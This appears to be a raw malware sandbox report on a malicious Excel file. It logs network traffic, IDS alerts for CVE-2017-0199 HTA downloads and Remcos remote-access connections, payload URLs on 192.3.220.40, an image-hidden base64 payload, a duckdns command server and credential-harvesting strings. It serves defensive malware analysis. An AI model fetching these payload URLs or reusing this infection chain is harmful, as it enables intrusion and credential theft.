                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                    Source: global trafficTCP traffic: 188.114.97.3:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global trafficTCP traffic: 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 192.3.220.40:80
                    Source: global traffic | TCP traffic: 192.3.220.40:80 -> 192.168.2.22:49165

                    Networking

                    Source: Network traffic | Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 192.3.220.40:80
                    Source: Network traffic | Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.220.40:80 -> 192.168.2.22:49162
                    Source: Network traffic | Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.220.40:80
                    Source: Network traffic | Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.220.40:80 -> 192.168.2.22:49164
                    Source: Network traffic | Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 192.3.220.40:80 -> 192.168.2.22:49171
                    Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 192.3.220.40:80 -> 192.168.2.22:49171
                    Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49173 -> 135.148.195.248:6875
                    Source: Network traffic | Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49172 -> 192.3.220.40:80
                    Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49174 -> 135.148.195.248:6875
                    Source: Network traffic | Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 192.3.220.40:80 -> 192.168.2.22:49177
                    Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 192.3.220.40:80 -> 192.168.2.22:49177
                    Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.242:443 -> 192.168.2.22:49166
                    Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.242:443 -> 192.168.2.22:49176
                    Source: Malware configuration extractor | URLs: idabo.duckdns.org
                    Source: unknown | DNS query: name: idabo.duckdns.org
                    Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 135.148.195.248:6875
                    Source: global traffic | HTTP traffic detected: GET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1 Host: ia600102.us.archive.org Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /330/RRCGGH.txt HTTP/1.1 Host: 192.3.220.40 Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
                    Source: Joe Sandbox View | IP Address: 135.148.195.248 135.148.195.248
                    Source: Joe Sandbox View | IP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox View | ASN Name: AVAYAUS AVAYAUS
                    Source: Joe Sandbox View | ASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
                    Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                    Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                    Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49175 -> 178.237.33.50:80
                    Source: global traffic | HTTP traffic detected: GET /EhYykL HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: wrath.me Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /EhYykL HTTP/1.1 Accept: */* Accept-Language: fr-FR UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: wrath.me Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /330/uh/newthingtobeonlinefor.hta HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.220.40 Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /330/uh/newthingtobeonlinefor.hta HTTP/1.1 Accept: */* Accept-Language: fr-FR UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Range: bytes=8896- Connection: Keep-Alive Host: 192.3.220.40 If-Range: "1d7e1-623f1fc7dcdfc"
                    Source: global traffic | HTTP traffic detected: GET /330/verybestthingswesharedfornew.tIF HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.220.40 Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /330/uh/newthingtobeonlinefor.hta HTTP/1.1 Accept: */* Accept-Language: fr-FR UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) If-Modified-Since: Tue, 08 Oct 2024 07:21:30 GMT Connection: Keep-Alive Host: 192.3.220.40 If-None-Match: "1d7e1-623f1fc7dcdfc"
                    Source: unknown | HTTPS traffic detected: 207.241.227.242:443 -> 192.168.2.22:49166 version: TLS 1.0
                    Source: unknown | HTTPS traffic detected: 207.241.227.242:443 -> 192.168.2.22:49176 version: TLS 1.0
                    Source: unknown | TCP traffic detected without corresponding DNS query: 192.3.220.40
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE89957018 URLDownloadToFileW,7_2_000007FE89957018
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5044CFE0.emf
                    Source: global traffic HTTP traffic detected: GET /EhYykL HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: wrath.me Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: GET /EhYykL HTTP/1.1 Accept: */* Accept-Language: fr-FR UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: wrath.me Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: GET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1 Host: ia600102.us.archive.org Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: GET /330/uh/newthingtobeonlinefor.hta HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.220.40 Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: GET /330/uh/newthingtobeonlinefor.hta HTTP/1.1 Accept: */* Accept-Language: fr-FR UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Range: bytes=8896- Connection: Keep-Alive Host: 192.3.220.40 If-Range: "1d7e1-623f1fc7dcdfc"
                    Source: global traffic HTTP traffic detected: GET /330/verybestthingswesharedfornew.tIF HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 192.3.220.40 Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: GET /330/RRCGGH.txt HTTP/1.1 Host: 192.3.220.40 Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: GET /330/uh/newthingtobeonlinefor.hta HTTP/1.1 Accept: */* Accept-Language: fr-FR UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) If-Modified-Since: Tue, 08 Oct 2024 07:21:30 GMT Connection: Keep-Alive Host: 192.3.220.40 If-None-Match: "1d7e1-623f1fc7dcdfc"
                    Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
                    Source: bhv8392.tmp.21.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                    Source: RegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                    Source: RegAsm.exe, RegAsm.exe, 00000018.00000002.483414634.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                    Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: bhv8392.tmp.21.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                    Source: mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                    Source: RegAsm.exe, 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                    Source: RegAsm.exe, 00000015.00000002.486254625.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: global traffic DNS traffic detected: DNS query: wrath.me
                    Source: global traffic DNS traffic detected: DNS query: ia600102.us.archive.org
                    Source: global traffic DNS traffic detected: DNS query: idabo.duckdns.org
                    Source: global traffic DNS traffic detected: DNS query: geoplugin.net
                    Source: powershell.exe, 0000000E.00000002.473005129.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.517043980.00000000026A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.40
